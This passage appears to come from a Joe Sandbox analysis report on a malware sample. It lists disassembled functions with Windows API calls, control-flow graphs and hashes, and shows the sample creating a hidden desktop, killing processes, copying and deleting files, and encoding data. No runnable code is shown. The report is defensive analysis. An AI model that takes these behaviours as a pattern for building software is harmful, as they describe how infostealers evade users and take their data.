                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c6e51418689e5e4f928340cd0b68f4a3454b26266b9b7ff0646cc345c9108b6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B62D8B5D002589BCF01EF65C881AED77B6FF55308F00915EE8156B292DB38ABC9CB94
                                                                                                                                                                                                                                                  Function 0040AB8F Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 191stringsleepprocessCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 2386 40ab8f-40abb8 memset 2387 40abd1-40abdd 2386->2387 2388 40abba-40abca 2386->2388 2389 40abfb-40ac20 OpenDesktopA 2387->2389 2390 40abdf-40abf4 2387->2390 2388->2387 2392 40ac42-40ac7b memset lstrcatA * 2 2389->2392 2393 40ac22-40ac3c CreateDesktopA 2389->2393 2390->2389 2394 40ac8d-40accd memset call 414ae0 call 41398e 2392->2394 2395 40ac7d-40ac86 2392->2395 2393->2392 2401 40acf0-40ad7c call 414e77 lstrcpyA call 413770 call 4152a5 CreateProcessA 2394->2401 2402 40accf-40ace9 2394->2402 2395->2394 2409 40ad82-40ae33 Sleep call 413740 * 4 call 40a7c1 call 415342 2401->2409 2410 40ae38-40ae6a CloseDesktop call 413770 * 4 2401->2410 2402->2401 2409->2410
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040ABA9
                                                                                                                                                                                                                                                  • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 0040AC18
                                                                                                                                                                                                                                                  • CreateDesktopA.USER32 ref: 0040AC3C
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040AC53
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 0040AC5F
                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 0040AC69
                                                                                                                                                                                                                                                  • memset.MSVCRT ref: 0040ACA3
                                                                                                                                                                                                                                                  • lstrcpyA.KERNEL32(?,00000000,?,OCALAPPDATA,00000000,?,0000001C), ref: 0040AD04
                                                                                                                                                                                                                                                  • CreateProcessA.KERNEL32 ref: 0040AD74
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00001388), ref: 0040AD87
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 0040A7C1: memset.MSVCRT ref: 0040A895
                                                                                                                                                                                                                                                    • Part of subcall function 0040A7C1: lstrcatA.KERNEL32(00000000,00643A53,00000000,00643A38,0042EEFC), ref: 0040A8FA
                                                                                                                                                                                                                                                    • Part of subcall function 0040A7C1: lstrcatA.KERNEL32(00000000,?), ref: 0040A90A
                                                                                                                                                                                                                                                    • Part of subcall function 00415342: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00415358
                                                                                                                                                                                                                                                    • Part of subcall function 00415342: Process32First.KERNEL32(00000000,?), ref: 00415362
                                                                                                                                                                                                                                                    • Part of subcall function 00415342: Process32Next.KERNEL32(00000000,?), ref: 0041536E
                                                                                                                                                                                                                                                    • Part of subcall function 00415342: OpenProcess.KERNEL32(00000001,00000000,?), ref: 00415392
                                                                                                                                                                                                                                                    • Part of subcall function 00415342: TerminateProcess.KERNEL32(00000000,00000000), ref: 004153A1
                                                                                                                                                                                                                                                    • Part of subcall function 00415342: CloseHandle.KERNEL32(00000000), ref: 004153A8
                                                                                                                                                                                                                                                    • Part of subcall function 00415342: Process32Next.KERNEL32(00000000,?), ref: 004153B0
                                                                                                                                                                                                                                                    • Part of subcall function 00415342: CloseHandle.KERNEL32(00000000), ref: 004153BB
                                                                                                                                                                                                                                                  • CloseDesktop.USER32(?), ref: 0040AE3B
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: lstrcatmemset$CloseCreateDesktopProcessProcess32$HandleNextOpenlstrcpy$FirstSleepSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                  • String ID: ChromeBuildTools$OCALAPPDATA
                                                                                                                                                                                                                                                  • API String ID: 1010841495-1746588603
                                                                                                                                                                                                                                                  • Opcode ID: 2f1e4990af193369e0fe23563a2b48ce88a4d32ec127e9fc2fdf05409dd7a9b3
                                                                                                                                                                                                                                                  • Instruction ID: ec91edd0ab285c5cc363a8a4a16679f2a80a84b4960ec0103b89f5f3963ca30b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f1e4990af193369e0fe23563a2b48ce88a4d32ec127e9fc2fdf05409dd7a9b3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C81E075C003499BDB01EF20DC467EABBB5BF55308F00921AF98876252EB74A7D8CB85
                                                                                                                                                                                                                                                  Function 00401825 Relevance: 20.0, APIs: 10, Strings: 1, Instructions: 775fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 2487 401825-401857 call 41370e * 2 2492 401859-40185c 2487->2492 2493 40186c-401874 2487->2493 2494 401876-40187c 2492->2494 2495 40185e-401860 2492->2495 2496 40187e-4018a7 call 414ae0 call 413806 call 4137c0 call 413770 * 2 2493->2496 2494->2496 2497 401862-40186a 2495->2497 2498 4018ac-4018b3 2495->2498 2496->2498 2497->2496 2501 4018b9-4018d3 call 413806 2498->2501 2502 40196c-401986 call 413806 2498->2502 2512 4018e5-40190f call 413860 call 413806 2501->2512 2513 4018d5-4018de 2501->2513 2509 401998-401a03 call 413860 call 413806 call 413860 call 413806 call 4137c0 call 413770 * 4 2502->2509 2510 401988-401991 2502->2510 2550 401a06-401a29 call 413770 call 41398e FindFirstFileA 2509->2550 2510->2509 2526 401911-401922 2512->2526 2527 401929-401967 call 413860 call 4137c0 call 413770 * 3 2512->2527 2513->2512 2526->2527 2527->2550 2557 402237-40228c call 413770 * 9 2550->2557 2558 401a2f-401a4f 2550->2558 2613 402290-4022a0 call 413770 * 2 2557->2613 2560 401a52-401a59 2558->2560 2562 401a6b-401a80 2560->2562 2563 401a5b-401a64 2560->2563 2567 401a86-401a8d 2562->2567 2568 402207-402217 FindNextFileA 2562->2568 2563->2562 2570 401aa6-401abb 2567->2570 2571 401a8f-401a9f 2567->2571 2568->2560 2572 40221d-402232 FindClose call 41395a * 2 2568->2572 2570->2568 2580 401ac1-401ad7 call 41370e 2570->2580 2571->2570 2572->2557 2587 401eb1-401ec7 call 413806 2580->2587 2588 401add-401af6 call 413806 2580->2588 2595 401ed9-401f63 call 413860 call 413806 call 413860 * 2 call 4137c0 call 413770 * 5 call 413740 call 414ab3 2587->2595 2596 401ec9-401ed2 2587->2596 2598 401b08-401baf call 413860 call 413806 call 413860 * 3 call 413806 call 413770 * 6 call 41398e FindFirstFileA 2588->2598 2599 401af8-401b01 2588->2599 2657 401f69-401f8d call 41370e call 413860 2595->2657 2658 4021fc-402204 call 413770 2595->2658 2596->2595 2598->2613 2664 401bb5 2598->2664 2599->2598 2613->2557 2670 401f9f-402009 call 413860 call 413806 call 413860 call 4137c0 call 413770 * 4 2657->2670 2671 401f8f-401f98 2657->2671 2658->2568 2666 401bb8-401bbf 2664->2666 2668 401bd1-401c21 call 413860 * 2 call 4137c0 call 413770 * 2 call 413740 call 414ab3 2666->2668 2669 401bc1-401bca 2666->2669 2700 401e83-401e9b FindNextFileA 2668->2700 2701 401c27-401c51 call 41370e call 413860 2668->2701 2669->2668 2708 402023-40206d call 413860 call 4137c0 call 413770 call 41370e call 413860 call 413806 2670->2708 2709 40200b-40201e call 413860 call 4137c0 call 413770 2670->2709 2671->2670 2700->2666 2702 401ea1-401eac FindClose 2700->2702 2718 401c63-401da8 call 413860 call 413806 call 413860 call 4137c0 call 413770 * 4 call 413860 call 4137c0 call 413770 call 41370e call 413860 call 413806 call 413860 call 4148f3 call 413806 call 4137c0 call 413770 * 5 call 41398e * 2 CopyFileA call 413740 call 40ae6d 2701->2718 2719 401c53-401c5c 2701->2719 2705 4021f4-4021f9 call 413770 2702->2705 2705->2658 2743 40207f-40211e call 413860 call 4148f3 call 413806 call 4137c0 call 413770 * 5 call 41398e * 2 CopyFileA call 413740 call 40ae6d 2708->2743 2744 40206f-402078 2708->2744 2709->2708 2840 401e46-401e7e call 41398e DeleteFileA call 41395a * 2 call 4147f4 call 413770 * 2 2718->2840 2841 401dae-401e41 call 413740 * 5 call 41797d call 413770 2718->2841 2719->2718 2798 402124-4021ba call 413740 * 5 call 41797d call 413770 2743->2798 2799 4021bf-4021f2 call 41398e DeleteFileA call 41395a * 2 call 4147f4 call 413770 2743->2799 2744->2743 2798->2799 2799->2705 2840->2700 2841->2840
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,00000028,00000028,00000028,?,?,004316B0,?,?,?,004316B0,?,?,00000028,00000028,?), ref: 00401A24
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32(00000000,?,?,?,?,004316B0,?,?,?,004316B0,00000000,?,?,004316B0,?,?), ref: 00401BA7
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrlenA.KERNEL32(?,?,?,?,?,00407506,?,------,?,?,?,?,00000014), ref: 00413879
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,00407506,?,------,?,?,?,?,00000014), ref: 004138A2
                                                                                                                                                                                                                                                    • Part of subcall function 00413860: lstrcatA.KERNEL32(00000000,?,?,00407506,?,------,?,?,?,?,00000014), ref: 004138AA
                                                                                                                                                                                                                                                    • Part of subcall function 004137C0: lstrcpyA.KERNEL32(00000000,?,?,?,?,004074B1,?,?,?,?,00000014), ref: 004137F8
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,004074A9,?,?,?,00000014), ref: 00413846
                                                                                                                                                                                                                                                    • Part of subcall function 00413806: lstrcatA.KERNEL32(00000000,?,?,004074A9,?,?,?,00000014), ref: 00413850
                                                                                                                                                                                                                                                    • Part of subcall function 004148F3: GetSystemTime.KERNEL32(?,ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890,0042EEFC,00407497,?,00000014), ref: 00414960
                                                                                                                                                                                                                                                    • Part of subcall function 004148F3: lstrlenA.KERNEL32(00000000), ref: 004149BE
                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?), ref: 00401E57
                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(?,?,?,?,?,004316B0), ref: 00401E8D
                                                                                                                                                                                                                                                  • FindClose.KERNEL32(?,?,?,004316B0), ref: 00401EA4
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D82
                                                                                                                                                                                                                                                    • Part of subcall function 00413740: lstrcpyA.KERNEL32(00000000,?,?,?,?,0041A972,?), ref: 00413763
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: CreateFileA.KERNEL32 ref: 0040AEA5
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: GetFileSizeEx.KERNEL32(00000000,?), ref: 0040AEB5
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: LocalAlloc.KERNEL32(00000040,8BE3897C), ref: 0040AED8
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: ReadFile.KERNEL32(00000000,EC8350EC,8BE3897C,?,00000000), ref: 0040AEF9
                                                                                                                                                                                                                                                    • Part of subcall function 0040AE6D: CloseHandle.KERNEL32(00000000), ref: 0040AF1F
                                                                                                                                                                                                                                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 004020F2
                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,?), ref: 004021D0
                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040220F
                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 0040221E
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00417A27
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: CreateThread.KERNEL32(00000000,00000000,Function_0001A90D,?,00000000,00000000), ref: 00417A79
                                                                                                                                                                                                                                                    • Part of subcall function 0041797D: WaitForSingleObject.KERNEL32(00000000,000003E8,?,?,?,?,?,?,?,?,?,?,?,?,004017BD,?), ref: 00417A85
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcatlstrlen$AllocHandleLocalObjectReadSingleSizeSleepSystemThreadTimeWait
                                                                                                                                                                                                                                                  • String ID: \*.*
                                                                                                                                                                                                                                                  • API String ID: 2017216726-1173974218
                                                                                                                                                                                                                                                  • Opcode ID: eef532cc65a97336aa04c3431b8e41e9d8b606ca34f2aae58e883b8c3ab284e0
                                                                                                                                                                                                                                                  • Instruction ID: 1220b35e9d2845434e99ad0bf1b72ddbdabecf6e0090be4ca8ca09fb3933a3c4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eef532cc65a97336aa04c3431b8e41e9d8b606ca34f2aae58e883b8c3ab284e0
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4052B5B59002189BCF05FFA2CC56AEE7779AF44309F04815EF41567192DF386B89CBA8
                                                                                                                                                                                                                                                  Function 004152A5 Relevance: 13.6, APIs: 9, Instructions: 57processCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 2961 4152a5-4152cf CreateToolhelp32Snapshot Process32First 2962 4152d1-4152db Process32Next 2961->2962 2963 41532e-41533f CloseHandle 2961->2963 2962->2963 2964 4152dd-4152e8 2962->2964 2965 4152eb-4152f5 StrCmpCA 2964->2965 2966 415322-41532c Process32Next 2965->2966 2967 4152f7-41530b OpenProcess 2965->2967 2966->2963 2966->2965 2968 415316-41531f CloseHandle 2967->2968 2969 41530d-415310 TerminateProcess 2967->2969 2968->2966 2969->2968
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004152BD
                                                                                                                                                                                                                                                  • Process32First.KERNEL32(00000000,?), ref: 004152C7
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 004152D3
                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(?,?), ref: 004152ED
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00415301
                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00415310
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00415317
                                                                                                                                                                                                                                                  • Process32Next.KERNEL32(00000000,?), ref: 00415324
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041532F
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3836391474-0
                                                                                                                                                                                                                                                  • Opcode ID: 744bf93798593bbbf3aff87105b76b44fa1c2028e89e1f0adc62def67fc8c5fa
                                                                                                                                                                                                                                                  • Instruction ID: a2afd96498c18a56c68c4cfc557fe070022b821dc9dd236c37024e5ac4685a68
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 744bf93798593bbbf3aff87105b76b44fa1c2028e89e1f0adc62def67fc8c5fa
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E11C839200705AFD3202B61AC4EFAB7BADFFC6751F051019FA0592251DFB49851CA75
                                                                                                                                                                                                                                                  Function 00414B70 Relevance: 10.6, APIs: 7, Instructions: 66memoryencryptionCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,004073EC,?,?,?,?,?), ref: 00414BA6
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,004073EC,?,?,?,?,?), ref: 00414BB9
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000008,?,?,004073EC,?,?,?,?,?), ref: 00414BC3
                                                                                                                                                                                                                                                  • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,004073EC,?,?,?,?,?), ref: 00414BDA
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,004073EC,?,?,?,?,?), ref: 00414BF4
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,004073EC,?,?,?,?,?), ref: 00414C02
                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,?,?,?,004073EC,?,?,?,?,?), ref: 00414C0D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000048D000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004BA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004C2000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004DB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004E4000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000004EA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005AC000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.00000000005B9000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000643000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000647000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_4508a44a11.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Heap$BinaryCryptProcessString$AllocateErrorFreeLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 798923657-0
                                                                                                                                                                                                                                                  • Opcode ID: 7589891c4f873d9eacc06b29ea4d395704f2ffe9cccf2032afe3450d41c03d5a
                                                                                                                                                                                                                                                  • Instruction ID: 1bfb67afbcc3eeebdcc58bb0437d5f96cd4b86678791dfef96fa76067c12a520
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7589891c4f873d9eacc06b29ea4d395704f2ffe9cccf2032afe3450d41c03d5a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C9118B75205205AFE7209FA5AC84F57BBA9FBC9744F16042DFA8083210DB79DC859BA0
                                                                                                                                                                                                                                                  Function 00401458 Relevance: 7.5, APIs: 5, Instructions: 42registrymemoryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00401475
                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,00000000,00000104), ref: 00401484
                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(?,?,00000000,00020119), ref: 00401493
                                                                                                                                                                                                                                                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,000000FF), ref: 004014AD
                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32 ref: 004014B6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000007.00000002.3437971696.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000436000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000447000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.000000000045A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000484000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000007.00000002.3437971696.0000000000489000.00000040.00000001.01000000.00000009.sdmpDownload File
